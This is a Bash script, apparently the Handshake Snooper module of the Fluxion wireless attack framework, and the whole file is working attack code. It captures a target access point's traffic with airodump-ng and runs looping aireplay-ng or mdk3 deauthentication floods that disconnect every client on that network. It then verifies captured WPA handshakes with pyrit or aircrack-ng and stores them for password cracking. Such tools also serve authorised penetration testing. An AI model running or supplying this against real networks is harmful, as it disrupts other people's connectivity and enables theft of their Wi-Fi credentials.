493 lines
17 KiB
Bash
Executable File
493 lines
17 KiB
Bash
Executable File
#!/bin/bash
|
|
|
|
# ============================================================ #
|
|
# ============= < Handshake Snooper Parameters > ============= #
|
|
# ============================================================ #
|
|
|
|
HandshakeSnooperState="Not Ready"
|
|
|
|
|
|
# ============================================================ #
|
|
# ========= < Handshake Snooper Helper Subroutines > ========= #
|
|
# ============================================================ #
|
|
handshake_snooper_header() {
|
|
fluxion_header; fluxion_target_show; echo
|
|
}
|
|
|
|
|
|
# ============================================================ #
|
|
# ============= < Handshake Snooper Subroutines > ============ #
|
|
# ============================================================ #
|
|
handshake_snooper_arbiter_daemon() {
|
|
if [ ${#@} -lt 1 -o "$HandshakeSnooperState" != "Running" ]; then
|
|
return 1;
|
|
fi
|
|
|
|
# Start daemon in the running state to continue execution until aborted,
|
|
# or until a hash has been verified to exist in the capture file.
|
|
# NOTE: The line below must remain before trap to prevent race conditions.
|
|
local handshake_snooper_arbiter_daemon_state="running"
|
|
|
|
handshake_snooper_arbiter_daemon_abort() {
|
|
handshake_snooper_arbiter_daemon_state="aborted"
|
|
if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]; then
|
|
kill $handshake_snooper_arbiter_daemon_viewerPID
|
|
fi
|
|
|
|
handshake_snooper_stop_deauthenticator
|
|
handshake_snooper_stop_captor
|
|
|
|
local -r now=$(env -i date '+%H:%M:%S')
|
|
echo -e "[$now] $HandshakeSnooperArbiterAbortedWarning" >> \
|
|
"$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
exit 2
|
|
}
|
|
|
|
trap handshake_snooper_arbiter_daemon_abort SIGABRT
|
|
|
|
source lib/HashUtils.sh
|
|
source lib/ColorUtils.sh
|
|
|
|
# Cleanup files we've previously created to avoid conflicts.
|
|
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/dump-*"
|
|
|
|
# Display some feedback to the user to assure verifier is working.
|
|
xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" \
|
|
-title "Handshake Snooper Arbiter Log" -e \
|
|
"tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" &
|
|
local handshake_snooper_arbiter_daemon_viewerPID=$!
|
|
|
|
local now=$(env -i date '+%H:%M:%S')
|
|
echo -e "[$now] $HandshakeSnooperStartingArbiterNotice" > \
|
|
"$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
|
|
handshake_snooper_start_captor
|
|
handshake_snooper_start_deauthenticator
|
|
|
|
local handshake_snooper_arbiter_daemon_verified=1 # Assume it hasn't been verified yet (1 => false/error).
|
|
|
|
# Keep snooping and verifying until we've got a valid hash from the capture file.
|
|
while [ $handshake_snooper_arbiter_daemon_verified -ne 0 ]; do
|
|
now=$(env -i date '+%H:%M:%S')
|
|
echo -e "[$now] $(io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice)" >> \
|
|
"$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
sleep $HandshakeSnooperVerifierInterval &
|
|
wait $! # Using wait to asynchronously catch flags while waiting.
|
|
|
|
# If synchronously searching, stop the captor and deauthenticator before checking.
|
|
if [ "$HandshakeSnooperVerifierSynchronicity" = "blocking" ]; then
|
|
now=$(env -i date '+%H:%M:%S')
|
|
echo -e "[$now] $HandshakeSnooperStoppingForVerifierNotice" >> \
|
|
"$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
handshake_snooper_stop_deauthenticator
|
|
handshake_snooper_stop_captor
|
|
mv "$FLUXIONWorkspacePath/capture/dump-01.cap" \
|
|
"$FLUXIONWorkspacePath/capture/recent.cap"
|
|
else
|
|
pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" \
|
|
-o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &> \
|
|
$FLUXIONOutputDevice
|
|
fi
|
|
|
|
now=$(env -i date '+%H:%M:%S')
|
|
echo -e "[$now] $HandshakeSnooperSearchingForHashesNotice" >> \
|
|
"$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
hash_check_handshake "$HandshakeSnooperVerifierIdentifier" \
|
|
"$FLUXIONWorkspacePath/capture/recent.cap" \
|
|
"$FluxionTargetSSID" "$FluxionTargetMAC"
|
|
handshake_snooper_arbiter_daemon_verified=$?
|
|
|
|
# If synchronously searching, restart the captor and deauthenticator after checking.
|
|
if [ "$HandshakeSnooperVerifierSynchronicity" = "blocking" -a \
|
|
$handshake_snooper_arbiter_daemon_verified -ne 0 ]; then
|
|
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/*"
|
|
|
|
handshake_snooper_start_captor
|
|
handshake_snooper_start_deauthenticator
|
|
fi
|
|
done
|
|
|
|
# Assure all processes are stopped before proceeding.
|
|
handshake_snooper_stop_deauthenticator
|
|
handshake_snooper_stop_captor
|
|
|
|
local completionTime=$(env -i date '+%H:%M:%S')
|
|
echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" >> \
|
|
"$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" >> \
|
|
"$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
|
|
# Assure we've got a directory to store hashes into.
|
|
mkdir -p "$FLUXIONPath/attacks/Handshake Snooper/handshakes/"
|
|
|
|
# Move handshake to storage if one was acquired.
|
|
mv "$FLUXIONWorkspacePath/capture/recent.cap" \
|
|
"$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap"
|
|
|
|
# Signal parent process the verification terminated.
|
|
kill -s SIGABRT $1
|
|
}
|
|
|
|
handshake_snooper_stop_captor() {
|
|
if [ "$HandshakeSnooperCaptorPID" ]; then
|
|
kill -s SIGINT $HandshakeSnooperCaptorPID &> $FLUXIONOutputDevice
|
|
fi
|
|
|
|
HandshakeSnooperCaptorPID=""
|
|
}
|
|
|
|
handshake_snooper_start_captor() {
|
|
if [ "$HandshakeSnooperCaptorPID" ]; then return 0; fi
|
|
if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi
|
|
|
|
handshake_snooper_stop_captor
|
|
|
|
xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $FluxionTargetChannel)" \
|
|
$TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \
|
|
airodump-ng --ignore-negative-one -d $FluxionTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $FluxionTargetChannel -a $HandshakeSnooperJammerInterface &
|
|
local parentPID=$!
|
|
|
|
while [ ! "$HandshakeSnooperCaptorPID" ]; do
|
|
sleep 1 &
|
|
wait $!
|
|
HandshakeSnooperCaptorPID=$(pgrep -P $parentPID)
|
|
done
|
|
}
|
|
|
|
handshake_snooper_stop_deauthenticator() {
|
|
if [ "$HandshakeSnooperDeauthenticatorPID" ]; then
|
|
kill $HandshakeSnooperDeauthenticatorPID &> $FLUXIONOutputDevice
|
|
fi
|
|
|
|
HandshakeSnooperDeauthenticatorPID=""
|
|
}
|
|
|
|
handshake_snooper_start_deauthenticator() {
|
|
if [ "$HandshakeSnooperDeauthenticatorPID" ]; then return 0; fi
|
|
if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi
|
|
|
|
handshake_snooper_stop_deauthenticator
|
|
|
|
# Prepare deauthenticators
|
|
case "$HandshakeSnooperDeauthenticatorIdentifier" in
|
|
"$HandshakeSnooperMdk3MethodOption")
|
|
echo "$FluxionTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst ;;
|
|
esac
|
|
|
|
# Start deauthenticators.
|
|
case "$HandshakeSnooperDeauthenticatorIdentifier" in
|
|
"$HandshakeSnooperAireplayMethodOption")
|
|
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \
|
|
-title "Deauthenticating all clients on $FluxionTargetSSID" -e \
|
|
"while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $FluxionTargetMAC --ignore-negative-one $HandshakeSnooperJammerInterface; done" &
|
|
HandshakeSnooperDeauthenticatorPID=$!
|
|
;;
|
|
"$HandshakeSnooperMdk3MethodOption")
|
|
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \
|
|
-title "Deauthenticating all clients on $FluxionTargetSSID" -e \
|
|
"while true; do sleep 7; timeout 3 mdk3 $HandshakeSnooperJammerInterface d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $FluxionTargetChannel; done" &
|
|
HandshakeSnooperDeauthenticatorPID=$!
|
|
;;
|
|
esac
|
|
}
|
|
|
|
|
|
handshake_snooper_unset_deauthenticator_identifier() {
|
|
if [ ! "$HandshakeSnooperDeauthenticatorIdentifier" ]; then return 1; fi
|
|
HandshakeSnooperDeauthenticatorIdentifier=""
|
|
}
|
|
|
|
handshake_snooper_set_deauthenticator_identifier() {
|
|
if [ "$HandshakeSnooperDeauthenticatorIdentifier" ]; then return 0; fi
|
|
|
|
handshake_snooper_unset_deauthenticator_identifier
|
|
|
|
local methods=(
|
|
"$HandshakeSnooperMonitorMethodOption"
|
|
"$HandshakeSnooperAireplayMethodOption"
|
|
"$HandshakeSnooperMdk3MethodOption"
|
|
"$FLUXIONGeneralBackOption"
|
|
)
|
|
io_query_choice "$HandshakeSnooperMethodQuery" methods[@]
|
|
|
|
HandshakeSnooperDeauthenticatorIdentifier=$IOQueryChoice
|
|
|
|
echo
|
|
|
|
if [ "$HandshakeSnooperDeauthenticatorIdentifier" = \
|
|
"$FLUXIONGeneralBackOption" ]; then
|
|
handshake_snooper_unset_deauthenticator_identifier
|
|
return 1
|
|
fi
|
|
}
|
|
|
|
handshake_snooper_unset_jammer_interface() {
|
|
HandshakeSnooperJammerInterfaceOriginal=""
|
|
|
|
if [ ! "$HandshakeSnooperJammerInterface" ]; then return 1; fi
|
|
HandshakeSnooperJammerInterface=""
|
|
|
|
# Check if we're automatically selecting the interface & skip
|
|
# this one if so to take the user back properly.
|
|
local interfacesAvailable
|
|
readarray -t interfacesAvailable < <(attack_targetting_interfaces)
|
|
|
|
if [ ${#interfacesAvailable[@]} -le 1 ]; then return 2; fi
|
|
}
|
|
|
|
handshake_snooper_set_jammer_interface() {
|
|
if [ "$HandshakeSnooperJammerInterface" ]; then return 0; fi
|
|
|
|
# NOTICE: The code below should be excluded because the interface selected
|
|
# below is also being used as the monitoring interface (required)!
|
|
#if [ "$HandshakeSnooperDeauthenticatorIdentifier" = \
|
|
# "$HandshakeSnooperMonitorMethodOption" ]; then return 0; fi
|
|
|
|
if [ ! "$HandshakeSnooperJammerInterfaceOriginal" ]; then
|
|
echo "Running get jammer interface." > $FLUXIONOutputDevice
|
|
if ! fluxion_get_interface attack_targetting_interfaces \
|
|
"$HandshakeSnooperJammerInterfaceQuery"; then
|
|
echo "Failed to get jammer interface" > $FLUXIONOutputDevice
|
|
return 1
|
|
fi
|
|
HandshakeSnooperJammerInterfaceOriginal=$FluxionInterfaceSelected
|
|
fi
|
|
|
|
local selectedInterface=$HandshakeSnooperJammerInterfaceOriginal
|
|
|
|
if ! fluxion_allocate_interface $selectedInterface; then
|
|
echo "Failed to allocate jammer interface" > $FLUXIONOutputDevice
|
|
return 2
|
|
fi
|
|
|
|
echo "Succeeded get jammer interface." > $FLUXIONOutputDevice
|
|
HandshakeSnooperJammerInterface=${FluxionInterfaces[$selectedInterface]}
|
|
}
|
|
|
|
handshake_snooper_unset_verifier_identifier() {
|
|
if [ ! "$HandshakeSnooperVerifierIdentifier" ]; then return 1; fi
|
|
HandshakeSnooperVerifierIdentifier=""
|
|
}
|
|
|
|
handshake_snooper_set_verifier_identifier() {
|
|
if [ "$HandshakeSnooperVerifierIdentifier" ]; then return 0; fi
|
|
|
|
handshake_snooper_unset_verifier_identifier
|
|
|
|
local choices=(
|
|
"$FLUXIONHashVerificationMethodPyritOption"
|
|
"$FLUXIONHashVerificationMethodAircrackOption"
|
|
"$FLUXIONGeneralBackOption"
|
|
)
|
|
io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@]
|
|
|
|
echo
|
|
|
|
case "$IOQueryChoice" in
|
|
"$FLUXIONHashVerificationMethodPyritOption")
|
|
HandshakeSnooperVerifierIdentifier="pyrit" ;;
|
|
"$FLUXIONHashVerificationMethodAircrackOption")
|
|
HandshakeSnooperVerifierIdentifier="aircrack-ng" ;;
|
|
"$FLUXIONGeneralBackOption")
|
|
handshake_snooper_unset_verifier_identifier
|
|
return 1
|
|
;;
|
|
esac
|
|
}
|
|
|
|
handshake_snooper_unset_verifier_interval() {
|
|
if [ ! "$HandshakeSnooperVerifierInterval" ]; then return 1; fi
|
|
HandshakeSnooperVerifierInterval=""
|
|
}
|
|
|
|
handshake_snooper_set_verifier_interval() {
|
|
if [ "$HandshakeSnooperVerifierInterval" ]; then return 0; fi
|
|
|
|
handshake_snooper_unset_verifier_interval
|
|
|
|
local choices=("$HandshakeSnooperVerifierInterval30SOption" "$HandshakeSnooperVerifierInterval60SOption" "$HandshakeSnooperVerifierInterval90SOption" "$FLUXIONGeneralBackOption")
|
|
io_query_choice "$HandshakeSnooperVerifierIntervalQuery" choices[@]
|
|
|
|
case "$IOQueryChoice" in
|
|
"$HandshakeSnooperVerifierInterval30SOption")
|
|
HandshakeSnooperVerifierInterval=30 ;;
|
|
"$HandshakeSnooperVerifierInterval60SOption")
|
|
HandshakeSnooperVerifierInterval=60 ;;
|
|
"$HandshakeSnooperVerifierInterval90SOption")
|
|
HandshakeSnooperVerifierInterval=90 ;;
|
|
"$FLUXIONGeneralBackOption")
|
|
handshake_snooper_unset_verifier_interval
|
|
return 1
|
|
;;
|
|
esac
|
|
}
|
|
|
|
handshake_snooper_unset_verifier_synchronicity() {
|
|
if [ ! "$HandshakeSnooperVerifierSynchronicity" ]; then return 1; fi
|
|
HandshakeSnooperVerifierSynchronicity=""
|
|
}
|
|
|
|
handshake_snooper_set_verifier_synchronicity() {
|
|
if [ "$HandshakeSnooperVerifierSynchronicity" ]; then return 0; fi
|
|
|
|
handshake_snooper_unset_verifier_synchronicity
|
|
|
|
local choices=(
|
|
"$HandshakeSnooperVerifierSynchronicityAsynchronousOption"
|
|
"$HandshakeSnooperVerifierSynchronicitySynchronousOption"
|
|
"$FLUXIONGeneralBackOption"
|
|
)
|
|
|
|
io_query_choice "$HandshakeSnooperVerifierSynchronicityQuery" choices[@]
|
|
|
|
case "$IOQueryChoice" in
|
|
"$HandshakeSnooperVerifierSynchronicityAsynchronousOption")
|
|
HandshakeSnooperVerifierSynchronicity="non-blocking" ;;
|
|
"$HandshakeSnooperVerifierSynchronicitySynchronousOption")
|
|
HandshakeSnooperVerifierSynchronicity="blocking" ;;
|
|
"$FLUXIONGeneralBackOption")
|
|
handshake_snooper_unset_verifier_synchronicity
|
|
return 1
|
|
;;
|
|
esac
|
|
}
|
|
|
|
|
|
# ============================================================ #
|
|
# =================== < Parse Parameters > =================== #
|
|
# ============================================================ #
|
|
if [ ! "$HandshakeSnooperCLIArguments" ]; then
|
|
if ! HandshakeSnooperCLIArguments=$(
|
|
getopt --options="v:i:j:a" \
|
|
--longoptions="verifier:,interval:,jammer:,asynchronous" \
|
|
--name="Handshake Snooper V$FLUXIONVersion.$FLUXIONRevision" -- "$@"
|
|
); then
|
|
echo -e "${CRed}Aborted$CClr, parameter error detected..."
|
|
sleep 5
|
|
fluxion_handle_exit
|
|
fi
|
|
|
|
declare -r HandshakeSnooperCLIArguments=$HandshakeSnooperCLIArguments
|
|
|
|
eval set -- "$HandshakeSnooperCLIArguments" # Set environment parameters.
|
|
fi
|
|
|
|
|
|
# ============================================================ #
|
|
# ============= < Argument Loaded Configurables > ============ #
|
|
# ============================================================ #
|
|
while [ "$1" != "" -a "$1" != "--" ]; do
|
|
case "$1" in
|
|
-v|--verifier)
|
|
HandshakeSnooperVerifierIdentifier=$2; shift;;
|
|
-i|--interval)
|
|
HandshakeSnooperVerifierInterval=$2; shift;;
|
|
-j|--jammer)
|
|
HandshakeSnooperJammerInterfaceOriginal=$2; shift;;
|
|
-a|--asynchronous)
|
|
HandshakeSnooperVerifierSynchronicity="non-blocking";;
|
|
esac
|
|
shift # Shift new parameters
|
|
done
|
|
|
|
|
|
# ============================================================ #
|
|
# ===================== < Fluxion Hooks > ==================== #
|
|
# ============================================================ #
|
|
attack_targetting_interfaces() {
|
|
interface_list_wireless
|
|
local interface
|
|
for interface in "${InterfaceListWireless[@]}"; do
|
|
echo "$interface"
|
|
done
|
|
}
|
|
|
|
attack_tracking_interfaces() {
|
|
interface_list_wireless
|
|
local interface
|
|
for interface in "${InterfaceListWireless[@]}"; do
|
|
echo "$interface"
|
|
done
|
|
echo "" # This enables the Skip option.
|
|
}
|
|
|
|
unprep_attack() {
|
|
HandshakeSnooperState="Not Ready"
|
|
|
|
handshake_snooper_unset_verifier_synchronicity
|
|
handshake_snooper_unset_verifier_interval
|
|
handshake_snooper_unset_verifier_identifier
|
|
handshake_snooper_unset_jammer_interface
|
|
handshake_snooper_unset_deauthenticator_identifier
|
|
|
|
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture"
|
|
}
|
|
|
|
prep_attack() {
|
|
mkdir -p "$FLUXIONWorkspacePath/capture"
|
|
|
|
IOUtilsHeader="handshake_snooper_header"
|
|
|
|
# Removed read-only due to local constant shadowing bug.
|
|
# I've reported the bug, we can add it when fixed.
|
|
local sequence=(
|
|
"set_deauthenticator_identifier"
|
|
"set_jammer_interface"
|
|
"set_verifier_identifier"
|
|
"set_verifier_interval"
|
|
"set_verifier_synchronicity"
|
|
)
|
|
|
|
if ! fluxion_do_sequence handshake_snooper sequence[@]; then
|
|
return 1
|
|
fi
|
|
|
|
HandshakeSnooperState="Ready"
|
|
}
|
|
|
|
load_attack() {
|
|
local -r configurationPath=$1
|
|
|
|
local configuration
|
|
readarray -t configuration < <(more "$configurationPath")
|
|
|
|
HandshakeSnooperDeauthenticatorIdentifier=${configuration[0]}
|
|
HandshakeSnooperJammerInterfaceOriginal=${configuration[1]}
|
|
HandshakeSnooperVerifierIdentifier=${configuration[2]}
|
|
HandshakeSnooperVerifierInterval=${configuration[3]}
|
|
HandshakeSnooperVerifierSynchronicity=${configuration[4]}
|
|
}
|
|
|
|
save_attack() {
|
|
local -r configurationPath=$1
|
|
|
|
# Store/overwrite attack configuration for pause & resume.
|
|
# Order: DeauthID, JammerWI, VerifId, VerifInt, VerifSync
|
|
echo "$HandshakeSnooperDeauthenticatorIdentifier" > "$configurationPath"
|
|
echo "$HandshakeSnooperJammerInterfaceOriginal" >> "$configurationPath"
|
|
echo "$HandshakeSnooperVerifierIdentifier" >> "$configurationPath"
|
|
echo "$HandshakeSnooperVerifierInterval" >> "$configurationPath"
|
|
echo "$HandshakeSnooperVerifierSynchronicity" >> "$configurationPath"
|
|
}
|
|
|
|
stop_attack() {
|
|
if [ "$HandshakeSnooperArbiterPID" ]; then
|
|
kill -s SIGABRT $HandshakeSnooperArbiterPID &> $FLUXIONOutputDevice
|
|
fi
|
|
|
|
HandshakeSnooperArbiterPID=""
|
|
|
|
HandshakeSnooperState="Stopped"
|
|
}
|
|
|
|
start_attack() {
|
|
if [ "$HandshakeSnooperState" = "Running" ]; then return 0; fi
|
|
if [ "$HandshakeSnooperState" != "Ready" ]; then return 1; fi
|
|
HandshakeSnooperState="Running"
|
|
|
|
handshake_snooper_arbiter_daemon $$ &> $FLUXIONOutputDevice &
|
|
HandshakeSnooperArbiterPID=$!
|
|
}
|
|
|
|
# FLUXSCRIPT END
|